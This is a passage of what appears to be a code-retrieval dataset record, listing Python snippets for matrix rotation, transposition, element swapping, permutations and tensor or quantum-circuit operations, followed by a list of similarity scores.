dtype=self.coeff.dtype)\n buf = trans.coeff.reshape(self.lena(), self.lenb())\n self._apply_columns_recursive_alpha(mat1, buf)\n\n if fqe.settings.use_accelerated_code:\n _transpose(trans.coeff, self.coeff)\n else:\n trans.coeff[:, :] = self.coeff.T[:, :]\n buf = self.coeff.reshape(self.lenb(), self.lena())\n trans._apply_columns_recursive_alpha(mat2, buf)\n\n if fqe.settings.use_accelerated_code:\n _transpose(self.coeff, trans.coeff)\n else:\n self.coeff[:, :] = trans.coeff.T[:, :]", "def swap2(d, n, v, i, j):\n for a in range(n):\n for k in range(d):\n if k == i or k == j:\n continue\n x = a*d*d + d*i + k\n y = a*d*d + d*j + k\n v[x], v[y] = v[y], v[x]\n\n x = a*d*d + d*k + i\n y = a*d*d + d*k + j\n v[x], v[y] = v[y], v[x]\n\n x = a*d*d + d*i + i\n y = a*d*d + d*j + j\n v[x], v[y] = v[y], v[x]\n\n x = a*d*d + d*j + i\n y = a*d*d + d*i + j\n v[x], v[y] = v[y], v[x]", "def rotate(self, matrix: List[List[int]]) -> None:\n # transpose\n N = len(matrix)\n for i in range(N):\n for j in range(0, i):\n matrix[i][j] = matrix[i][j] ^ matrix[j][i]\n matrix[j][i] = matrix[i][j] ^ matrix[j][i]\n matrix[i][j] = matrix[i][j] ^ matrix[j][i]\n \n # print(matrix)\n # 左右互换\n for i in range(N):\n for j in range(N // 2):\n matrix[i][j] = matrix[i][j] ^ matrix[i][N - j - 1]\n matrix[i][N - j - 1] = matrix[i][j] ^ matrix[i][N - j - 1]\n matrix[i][j] = matrix[i][j] ^ matrix[i][N - j - 1]\n # print(matrix)", "def rotate(self, matrix: List[List[int]]) -> None:\n length = len(matrix)\n for row in range(length//2):\n for col in range(row, length-row-1):\n # matrix[row][col], matrix[col][length-1-row], matrix[length-1-row][length-1-col], matrix[length-1-col][row]\n matrix[col][length-1-row], matrix[length-1-row][length-1-col], matrix[length-1-col][row], matrix[row][col] = matrix[row][col], matrix[col][length-1-row], matrix[length-1-row][length-1-col], matrix[length-1-col][row]\n return", "def z_operator_matrix(self):\n n, r_1, r_2, k = self.n, self.r_1, self.r_2, self.k\n\n # Use the row vector [ A2^T 0 I ], which commutes with the check matrix.\n check_mat = np.zeros((k, n), dtype='int')\n check_mat[:, 0:r_1] = np.transpose(self.parity_check_c1[:, (r_1 + r_2):n])\n check_mat[:, (r_1 + r_2):n] = np.identity(k)\n return check_mat", "def rotate(self, matrix: list) -> None:\n for i in range(len(matrix)):\n for j in range(i):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n # matrix[i].reverse()\n print(matrix)\n for i in range(len(matrix)):\n matrix[i].reverse()\n print(matrix)", "def __mul__(self, other):\n #\n # TODO - your code here\n #\n final_matrix = []\n for i in range(self.h):\n temp_row = []\n for j in range(other.w):\n # take dot-product of row of\n # matrix in 1st arg with col of\n # matrix in 2nd arg\n temp_row.append(dot_product(get_row(self.g, i), get_col(other.g, j)))\n final_matrix.append(temp_row)\n return Matrix(final_matrix)\n # TODO - your code here", "def rotate_2d_matrix(matrix):\n\n L = len(matrix)\n for i in range(L // 2):\n for j in range(i, L - i - 1):\n temp = matrix[i][j]\n matrix[i][j] = matrix[L - 1 - j][i]\n matrix[L - 1 - j][i] = matrix[L - 1 - i][L - 1 - j]\n matrix[L - 1 - i][L - 1 - j] = matrix[j][L - 1 - i]\n matrix[j][L - 1 - i] = temp", "def trans_o(self):\n temp_array = []\n for j in range(self.O.shape[1]):\n for i in range(self.V.shape[1]):\n if self.V[0, i] == self.O[0, j]:\n temp_array.append(i)\n self.O = mat(temp_array)", "def mirror(self, p1=(0, 1), p2=(0, 0)) -> \"Group\":\n for e in self.elements:\n e.mirror(p1=p1, p2=p2)\n return self", "def _permute_generetably(elements: List[T], i: int):\n if i == 1:\n yield elements\n else:\n for j in range(i - 1):\n for permutation in _permute_generetably(elements, i - 1):\n yield permutation\n\n k = 0 if i % 2 == 1 else j\n\n elements[k], elements[i - 1] = elements[i - 1], elements[k]\n\n for permutation in _permute_generetably(elements, i - 1):\n yield permutation", "def rotate(self, matrix: List[List[int]]) -> None:\n if(matrix == None or len(matrix) == 1): return\n n = len(matrix)\n for i in range(0, n//2 + 1):\n for j in range(i, n-1-i):\n tmp = matrix[i][j]\n matrix[i][j] = matrix[n-1-j][i]\n matrix[n-1-j][i] = matrix[n-1-i][n-1-j]\n matrix[n-1-i][n-1-j] = matrix[j][n-1-i]\n matrix[j][n-1-i] = tmp\n \n return", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for i in range(n):\n for j in range(n // 2):\n matrix[i][j], matrix[i][n-1-j] = matrix[i][n-1-j], matrix[i][j]\n for i in range(n):\n for j in range(n-i):\n matrix[i][j], matrix[n-1-j][n-1-i] = matrix[n-1-j][n-1-i], matrix[i][j]", "def swap(self,i,j):\r\n self._data[i], self._data[j] = self._data[j], self._data[i]", "def mirror(self):\n for l in range(self.numRows):\n mirrorGrid = []\n for l in range(self.numCols):\n row = self.grid[l][::-1]\n mirrorGrid.append(row)\n return mirrorGrid", "def _swap(self, i, j):\n self._data[i], self._data[j] = self._data[j], self._data[i]", "def _swap(self, i, j):\n self._data[i], self._data[j] = self._data[j], self._data[i]", "def swapRows(self, i, j):\n if not (type(i) in MATRIX_VALID_INTS and type(\n j) in MATRIX_VALID_INTS): # this should be fixed to accomodate 'long' types\n raise TypeError(\"Row indices must be of type 'int'\")\n rowA = self.deleteRow(max(i, j))\n rowB = self.deleteRow(min(i, j))\n self.insertRow(min(i, j), *rowA)\n self.insertRow(max(i, j), *rowB)", "def reverse_cuthill_mckee(self, permutation: bool = True) -> [np.ndarray, np.ndarray]:\n # 1. get the connectivity matrix\n nodeids, C = self.node_connectivity_matrix()\n\n # 2. compute the new node order\n perm = scipy.sparse.csgraph.reverse_cuthill_mckee(C, False)\n\n # 3. create a dictionary with new node order\n nodeids = {nid: perm[i] for nid, i in nodeids.items()}\n\n if permutation:\n # 4. create the permutation matrix for node order if requested\n P = C[np._ix(perm, perm)]\n return nodeids, P\n else:\n # 4. or return just the new node order\n return nodeids", "def _swap2(self, cids, iids):\n # The coupling indexes of the two legs to swap\n c1, c2 = cids\n # The index of the two legs to swap within the given coupling\n i1, i2 = iids\n assert c1 != c2\n\n # Get the connecting coupling between the two couplings\n cnx = self.get_couplingnetwork().to_undirected(as_view=True)\n ci = set(nx.common_neighbors(cnx, *[self.coupling[ii] for ii in cids]))\n if len(ci) != 1:\n raise ValueError(f'cids: {cids} have {len(ci)} common neighbors')\n ci = self.coupling.index(ci.pop())\n\n # internal legs\n l1 = cnx.edges[self.coupling[c1], self.coupling[ci], 0]['leg']\n l2 = cnx.edges[self.coupling[c2], self.coupling[ci], 0]['leg']\n\n # index of the internal leg in c1 and c2\n legs = self.get_legs()\n il1, il2 = [[legs[x].index(ll) for x in (y, ci)]\n for y, ll in zip(cids, (l1, l2))]\n\n assert il1[0] != i1 and il2[0] != i2\n assert il1[1] != il2[1]\n # Check that the flow is consistent along the internal bond\n assert self.coupling[c1][il1[0]][1] is not self.coupling[ci][il1[1]][1]\n assert self.coupling[c2][il2[0]][1] is not self.coupling[ci][il2[1]][1]\n\n def permute_key(key):\n copy = list(list(k) for k in key)\n copy[c1][i1], copy[c2][i2] = copy[c2][i2], copy[c1][i1]\n return copy\n f1, f2, fi = ([x[1] for x in self.coupling[c]] for c in (c1, c2, ci))\n self._coupling = tuple(tuple(c) for c in permute_key(self.coupling))\n\n # All good interal symmetry sectors in for the swapped 1st coupling\n nkeys = set(tuple(tuple(e) for e in permute_key(k)) for k in self)\n c1set = {}\n r11, r12 = set(range(3)).difference([il1[0]])\n for k in set(key[c1] for key in nkeys):\n kn = (k[r11], k[r12])\n if kn not in c1set:\n c1set[kn] = set(\n sls.allowed_couplings(k, f1, il1[0], self.symmetries))\n c2set = {}\n r21, r22 = set(range(3)).difference([il2[0]])\n for k in set(key[c2] for key in nkeys):\n kn = (k[r21], k[r22])\n if kn not in c2set:\n c2set[kn] = set(\n sls.allowed_couplings(k, f2, il2[0], self.symmetries))\n\n vac = sls.vacuumIrrep(self.symmetries)\n Z1 = set().union(*c1set.values())\n Z2 = set().union(*c2set.values())\n rf = set(range(3)).difference([il1[1], il2[1]]).pop()\n fit = [fi[rf], fi[il1[1]], fi[il2[1]]]\n oks = {(k1, k2): set(sls.allowed_couplings((vac, k1, k2),\n fit, 0, self.symmetries))\n for k1, k2 in itertools.product(Z1, Z2)}\n\n def mappingf(okey):\n nk = permute_key(okey)\n set1 = c1set[(nk[c1][r11], nk[c1][r12])]\n set2 = c2set[(nk[c2][r21], nk[c2][r22])]\n for kk1 in set1:\n for kk2 in set2:\n if nk[ci][rf] not in oks[(kk1, kk2)]:\n continue\n\n # Assign the key of the internal leg\n nk[c1][il1[0]], nk[ci][il1[1]] = kk1, kk1\n nk[c2][il2[0]], nk[ci][il2[1]] = kk2, kk2\n yield tuple(tuple(e) for e in nk)\n\n prefdict = sls._prefswap2(iids, il1, il2, f1, f2, fi)\n\n def prefactorf(okey, nkey):\n flokey = [list(x) for x in\n zip(*[el for j in (c1, c2, ci) for el in okey[j]])]\n flnkey = [list(x) for x in\n zip(*[el for j in (c1, c2, ci) for el in nkey[j]])]\n return np.prod([prefdict.get(ss, lambda x, y: 1.)(o, n) for\n o, n, ss in zip(flokey, flnkey, self.symmetries)])\n\n self._manipulate_coupling(mappingf, prefactorf)\n return self", "def perm_2_let():\r\n return {''.join(i) for i in permutations('abcdefghijklmnopqrstuvwxyz', 2)}\r\n # print(comb_2_let, sep='')\r", "def transferMatrix(self, i1=0, i2=-1, plane=\"x\"):\n B2 = self.normMat(i2, plane=plane)\n B1 = self.normMat(i1, plane=plane)\n psi = 2 * np.pi * (self[\"mu\" + plane][i2] - self[\"mu\" + plane][i1])\n R = np.array([[np.cos(psi), np.sin(psi)], [-np.sin(psi), np.cos(psi)]])\n return np.dot(np.dot(B2, R), np.linang.inv(B1))", "def permutations(cube):\r\n yield from rotations24(cube)\r\n yield from rotations24(np.flip(cube, 0))\r\n yield from rotations24(np.flip(cube, 1))\r\n yield from rotations24(np.flip(cube, 2))", "def _swap(self, x1, y1, x2, y2):\n puzzle_copy = [list(row) for row in self.position] # copy the puzzle\n puzzle_copy[x1][y1], puzzle_copy[x2][y2] = puzzle_copy[x2][y2], puzzle_copy[x1][y1]\n\n return puzzle_copy", "def swap_full(permutation, transposition,nb_position):\n i, j = transposition\n res = np.array(permutation)\n res[i], res[j] = res[j], res[i]\n return tuple(res[:nb_position])", "def symmetrize(n):\n times = lambda x: jnp.concatenate((jnp.flipud(x), x))\n trans = lambda x: x[n:] + x[n-1::-1]\n return Operator(times=times, trans=trans, shape=(2*n,n))", "def rotate_matrix(self, mat):\r\n N=3\r\n for x in range(0, int(N / 2)):\r\n for y in range(x, N-x-1):\r\n temp = mat[x][y]\r\n mat[x][y] = mat[y][N-1-x]\r\n mat[y][N-1-x] = mat[N-1-x][N-1-y]\r\n mat[N-1-x][N-1-y] = mat[N-1-y][x]\r\n mat[N-1-y][x] = temp\r\n return mat", "def test_matrix(self, tol):\n\n res_static = qml.QFT.compute_matrix(2)\n res_dynamic = qml.QFT(wires=[0, 1]).matrix()\n res_reordered = qml.QFT(wires=[0, 1]).matrix([1, 0])\n\n expected = np.array(\n [\n [0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j],\n [0.5 + 0.0j, 0.0 + 0.5j, -0.5 + 0.0j, -0.0 - 0.5j],\n [0.5 + 0.0j, -0.5 + 0.0j, 0.5 - 0.0j, -0.5 + 0.0j],\n [0.5 + 0.0j, -0.0 - 0.5j, -0.5 + 0.0j, 0.0 + 0.5j],\n ]\n )\n\n assert np.allclose(res_static, expected, atol=tol, rtol=0)\n assert np.allclose(res_dynamic, expected, atol=tol, rtol=0)\n\n expected_permuted = [\n [0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j],\n [0.5 + 0.0j, 0.5 - 0.0j, -0.5 + 0.0j, -0.5 + 0.0j],\n [0.5 + 0.0j, -0.5 + 0.0j, 0.0 + 0.5j, -0.0 - 0.5j],\n [0.5 + 0.0j, -0.5 + 0.0j, -0.0 - 0.5j, 0.0 + 0.5j],\n ]\n assert np.allclose(res_reordered, expected_permuted, atol=tol, rtol=0)", "def rotate(self, matrix: list[list[int]]) -> None:", "def transpose(self):\n for i in range(self.columns): # This for loop makes the rows we need in our transposed matrix\n matrix = [] # List that will contain the rows of the transpose matrix\n for j in range(self.rows): # This for loop makes the columns we need in our transposed matrix\n matrix.append(self.Matrix[j][i]) \n self.Transpose.append(matrix) # Appending the rows into the bigger list we created\n print(\"This is your transposed matrix: \", self.Transpose)", "def rotate(self, matrix: List[List[int]]) -> None:\n height=len(matrix)\n for h in range(math.ceil(height/2)):\n for i in range(h,height-h-1):\n # print((h,i), (height-i-1,h))\n temp=matrix[h][i]\n matrix[h][i] = matrix[height-i-1][h]\n matrix[height-i-1][h] = matrix[height-h-1][height-i-1]\n matrix[height-h-1][height-i-1] = matrix[i][height-h-1]\n matrix[i][height-h-1] = temp", "def part_2():\n return itertools.permutations(range(5, 10))", "def test_two_qubit_weyl_decomposition_swap(self):\n for k1l, k1r, k2l, k2r in K1K2S:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n a = Ud(np.pi / 4, np.pi / 4, np.pi / 4)\n self.check_two_qubit_weyl_decomposition(k1 @ a @ k2)", "def swap(self, adjacent_transposition):\n\n result = Tensor()\n for key_self in self.keys():\n # ensure that the swap can be made with the available slots\n if max(adjacent_transposition) < len(key_self):\n prefix = Tensor({Tensor._merge_keys(*key_self[0 : min(adjacent_transposition)]): self[key_self]})\n root = type(self)._clifford_swap(\n *key_self[min(adjacent_transposition) : max(adjacent_transposition) + 1]\n )\n postfix = Tensor({Tensor._merge_keys(*key_self[max(adjacent_transposition) + 1 :]): 1})\n result = result + prefix * root * postfix\n else:\n result = result + Tensor({key_self: self[key_self]})\n self.clear()\n self.update(result)\n return self", "def swap(self, i: int, j: int) -> None:\n self.data[i], self.data[j] = self.data[j], self.data[i]", "def MatMulOrder(D):\r\n\tnum = len(D)-1 # number of matrix in the chain\r\n\tprint(f\"There are {num} matrix to multiply\")\r\n\tM = [[0 for _ in range(num)] for _ in range(num)]\r\n\tP = [[0 for _ in range(num)] for _ in range(num)]\r\n\r\n\t# i要从大到小\r\n\t# i == j时, M[i][j]=0,所以不用更新\r\n\t# i-th矩阵到j-th矩阵的乘的最优值初始化为inf\r\n\tfor i in range(num-2, -1, -1):\r\n\t\tfor j in range(i+1, num):\r\n\t\t\tM[i][j] = 100000000\r\n\t\t\tfor k in range(i, j):\r\n\t\t\t\tnew = M[i][k] + M[k+1][j] + D[i]*D[k+1]*D[j+1]\r\n\t\t\t\tif new < M[i][j]:\r\n\t\t\t\t\tM[i][j] = new \r\n\t\t\t\t\tP[i][j] = k\r\n\treturn M, P", "def contract(tensor):\n temp = np.einsum('ikma, jlan', tensor, tensor)\n M = np.zeros((tensor.shape[0]**2, tensor.shape[1]**2, tensor.shape[2], tensor.shape[3]))\n for i,j,k,l,m,n in it.product(*[range(x) for x in temp.shape]):\n M[i + tensor.shape[0]*j, k + tensor.shape[1]*l, m, n] = temp[i,j,k,l,m,n]\n return M", "def test_flip_vectors(self):\r\n m_matrix = array([[1.0, 0.0, 1.0], [2.0, 4.0, 4.0]])\r\n jn_matrix = array([[1.2, 0.1, -1.2], [2.5, 4.0, -4.5]])\r\n new_matrix = _flip_vectors(jn_matrix, m_matrix)\r\n assert_almost_equal(new_matrix, array([[1.2, 0.1, 1.2], [2.5, 4.0, 4.5]]))", "def test_flip_vectors(self):\n m_matrix = array([[1.0, 0.0, 1.0], [2.0, 4.0, 4.0]])\n jn_matrix = array([[1.2, 0.1, -1.2], [2.5, 4.0, -4.5]])\n new_matrix = _flip_vectors(jn_matrix, m_matrix)\n assert_almost_equal(new_matrix, array([[1.2, 0.1, 1.2], [2.5, 4.0, 4.5]]))", "def swapCouplingTuples(self, permutation):\n from collections import Counter\n\n if Counter(permutation) != Counter(range(len(self.coupling))):\n raise ValueError(f'Permutation {permutation} is not valid')\n\n def permute_key(key):\n return tuple(key[p] for p in permutation)\n\n self._coupling = permute_key(self.coupling)\n\n def mappingf(okey):\n yield permute_key(okey)\n\n self._manipulate_coupling(mappingf, lambda x, y: 1)\n return self", "def check_perm(tri1,tri2):\n for t1 in tri1:\n for t2 in tri2:\n if t1 == t2:\n return False\n return True", "def matrix_chain_dynamic(dimensions, n):\n\n m = [[-1 for _ in range(n)] for _ in range(n)]\n s = [[0 for _ in range(n)] for _ in range(n)]\n\n # multiplying matrix by itself\n for i in range(1, n):\n m[i][i] = 0\n\n for length in range(2, n):\n for i in range(1, n - length + 1):\n j = i + length - 1\n for k in range(i, j):\n cost = m[i][k] + m[k + 1][j] + dimensions[i - 1] * dimensions[k] * dimensions[j]\n if cost > m[i][j]:\n m[i][j] = cost\n # index if splitting\n s[i][j] = k\n return m, s", "def products(q_1: Qs, q_2: Qs, kind: str = \"\", reverse: bool = False) -> Qs:\n\n q_1_copy = deepcopy(q_1)\n q_2_copy = deepcopy(q_2)\n qs_left, qs_right = Qs(), Qs()\n\n # Diagonalize if need be.\n if ((q_1.rows == q_2.rows) and (q_1.columns == q_2.columns)) or (\n \"scalar_q\" in [q_1.qs_type, q_2.qs_type]\n ):\n\n if q_1.columns == 1:\n qs_right = q_2_copy\n qs_left = diagonal(q_1_copy, qs_right.rows)\n\n elif q_2.rows == 1:\n qs_left = q_1_copy\n qs_right = diagonal(q_2_copy, qs_left.columns)\n\n else:\n qs_left = q_1_copy\n qs_right = q_2_copy\n\n # Typical matrix multiplication criteria.\n elif q_1.columns == q_2.rows:\n qs_left = q_1_copy\n qs_right = q_2_copy\n\n else:\n print(\n \"Oops, cannot multiply series with row/column dimensions of {}/{} to {}/{}\".format(\n q_1.rows, q_1.columns, q_2.rows, q_2.columns\n )\n )\n\n # Operator products need to be transposed.\n operator_flag = False\n if qs_left in [\"op\", \"operator\"] and qs_right in [\"op\", \"operator\"]:\n operator_flag = True\n\n outer_row_max = qs_left.rows\n outer_column_max = qs_right.columns\n shared_inner_max = qs_left.columns\n projector_flag = (\n (shared_inner_max == 1) and (outer_row_max > 1) and (outer_column_max > 1)\n )\n\n result = [\n [q0(q_type=\"\") for _i in range(outer_column_max)]\n for _j in range(outer_row_max)\n ]\n\n for outer_row in range(outer_row_max):\n for outer_column in range(outer_column_max):\n for shared_inner in range(shared_inner_max):\n\n # For projection operators.\n left_index = outer_row\n right_index = outer_column\n\n if outer_row_max >= 1 and shared_inner_max > 1:\n left_index = outer_row + shared_inner * outer_row_max\n\n if outer_column_max >= 1 and shared_inner_max > 1:\n right_index = shared_inner + outer_column * shared_inner_max\n\n result[outer_row][outer_column] = add(result[outer_row][outer_column],\n product(qs_left.qs[left_index],\n qs_right.qs[right_index], kind=kind, reverse=reverse\n )\n )\n\n # Flatten the list.\n new_qs = [item for sublist in result for item in sublist]\n new_states = Qs(new_qs, rows=outer_row_max, columns=outer_column_max)\n\n if projector_flag or operator_flag:\n return transpose(new_states)\n\n else:\n return new_states", "def symmetry_duplication(\n bijection: BijectionType,\n ) -> Iterator[BijectionType]:\n return (\n bij\n for rotated in (\n {k.rotate(angle): v.rotate(angle) for k, v in bijection.items()}\n for angle in range(4)\n )\n for bij in (rotated, {k.inverse(): v.inverse() for k, v in rotated.items()})\n )", "def transposed(self) -> 'MatrixBoolean':\n\t\tmatrix = MatrixBoolean(empty=(self.dimN, self.dimM))\n\t\tfor m in range(self.dimM):\n\t\t\tfor n in range(self.dimN):\n\t\t\t\tmatrix.matrix[n][m] = self.matrix[m][n]\n\t\treturn matrix", "def _swap_energies(i, j, energies):\n energies[:, [i, j]] = energies[:, [j, i]]", "def test_two_qubit_weyl_decomposition_iswap(self):\n for k1l, k1r, k2l, k2r in K1K2S:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n a = Ud(np.pi / 4, np.pi / 4, 0)\n self.check_two_qubit_weyl_decomposition(k1 @ a @ k2)", "def pd(self, other):\n return Matriz([self]).T() * Matriz([other])", "def sort(self):\n for i in range(self.num):\n for j in range(i,0,-1):\n if self.genepool[0][j] < self.genepool[0][j-1]:\n self.genepool[0][j], self.genepool[0][j-1] = self.genepool[0][j-1], self.genepool[0][j]\n else:\n break\n for i in range(self.num):\n for j in range(i,0,-1):\n if self.genepool[1][j] < self.genepool[1][j-1]:\n self.genepool[1][j], self.genepool[1][j-1] = self.genepool[1][j-1], self.genepool[1][j]\n else:\n break" ]
[ "0.6260572", "0.61407316", "0.60737467", "0.58037573", "0.5779625", "0.5728096", "0.56909776", "0.5626455", "0.5626066", "0.55842173", "0.5571164", "0.5571073", "0.5566883", "0.55655205", "0.55617666", "0.5537897", "0.55265135", "0.5522779", "0.55212414", "0.5504172", "0.5502277", "0.5499689", "0.5494559", "0.54692745", "0.5448146", "0.54468817", "0.54391587", "0.5429634", "0.5419231", "0.54069114", "0.53999865", "0.5399903", "0.5388735", "0.5387693", "0.5350425", "0.53328", "0.5332238", "0.533077", "0.5323849", "0.5318166", "0.53097653", "0.5303948", "0.529397", "0.5292545", "0.52909434", "0.52904165", "0.5283748", "0.5261649", "0.5255824", "0.52543145", "0.5245406", "0.52424765", "0.52421993", "0.52369875", "0.5233853", "0.5228763", "0.5226109", "0.52213526", "0.5217493", "0.5204849", "0.520208", "0.5195528", "0.5190807", "0.5190738", "0.51806414", "0.5172804", "0.51701295", "0.51699954", "0.51699954", "0.51694405", "0.51596904", "0.51573694", "0.5154442", "0.51522404", "0.5142365", "0.5139053", "0.5130099", "0.5129072", "0.5119029", "0.5113565", "0.51092374", "0.51089793", "0.5106363", "0.51026005", "0.5097424", "0.5090588", "0.50893134", "0.50871736", "0.5085991", "0.50849617", "0.5084761", "0.5073242", "0.5065707", "0.50647956", "0.50643754", "0.50617826", "0.50549674", "0.5050744", "0.50503874", "0.5049664", "0.5049319" ]
0.0
-1